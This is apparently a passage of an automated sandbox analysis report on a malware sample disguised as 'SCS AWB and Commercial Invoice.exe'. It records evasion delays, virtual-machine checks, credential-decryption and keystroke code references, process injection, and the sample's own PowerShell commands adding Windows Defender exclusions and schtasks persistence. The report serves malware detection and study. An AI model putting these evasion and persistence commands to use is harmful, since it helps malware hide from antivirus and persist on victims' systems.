Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599528
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 599273
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598541
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598324
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598209
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597931
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597810
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597537
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597419
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597310
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596168
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594967
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594640
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594531
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594422
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593531
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593297
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593187
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 593078
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 592968
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598212
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597766
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597546
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596837
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596732
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596618
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596379
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596138
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595922
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595802
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread delayed: delay time: 594360

Source: bdeukn.exe, 00000010.00000002.4510487041.000000000393B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2B56gRKvmciZX2e5%2BnvAA37FTy4xiyAvH0hAwOl542Rw6pLHa%2BedIgy0Ik5O4LMgPm9cSyskJXMUiCvCm6f6PFFP2fBEheVUXKoI%2BZTQ%2ByKfo7o6TF7%2F9oi4J%2FdtohcOuubUtlkm"}],"group":"cf-nel","max_age":604800}
Source: SCS AWB and Commercial Invoice.exe, 00000009.00000002.4506291707.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y`
Source: HOYVjVj.exe, 0000000A.00000002.2123464259.0000000001702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SCS AWB and Commercial Invoice.exe, 00000009.00000002.4506291707.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: bdeukn.exe, 00000010.00000002.4510487041.000000000393B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2B56gRKvmciZX2e5%2BnvAA37FTy4xiyAvH0hAwOl542Rw6pLHa%2BedIgy0Ik5O4LMgPm9cSyskJXMUiCvCm6f6PFFP2fBEheVUXKoI%2BZTQ%2ByKfo7o6TF7%2F9oi4J%2FdtohcOuubUtlkm"}],"group":"cf-nel","max_age":604800}
Source: ungagCKiEnZdl.exe, 0000001C.00000002.4505642870.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: SCS AWB and Commercial Invoice.exe, 00000009.00000002.4506291707.0000000001475000.00000004.00000020.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4505947387.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4505220109.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SCS AWB and Commercial Invoice.exe, 00000009.00000002.4506291707.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l2

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: bdeukn.exe.9.dr, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: bdeukn.exe.9.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: bdeukn.exe.9.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe"
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe"

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Memory written: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Memory written: C:\Users\user\AppData\Roaming\HOYVjVj.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Memory written: C:\Users\user\AppData\Local\Temp\bxhciy.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Memory written: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe base: 140000000 value starts with: 4D5A

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread register set: target process: 7200
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Thread register set: target process: 7644

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe "C:\Users\user\AppData\Local\Temp\bxhciy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bdeukn.exe "C:\Users\user\AppData\Local\Temp\bdeukn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Users\user\AppData\Roaming\HOYVjVj.exe "C:\Users\user\AppData\Roaming\HOYVjVj.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp85CF.tmp"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe C:\Users\user\AppData\Local\Temp\bxhciy.exe
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp9F42.tmp"
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Process created: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
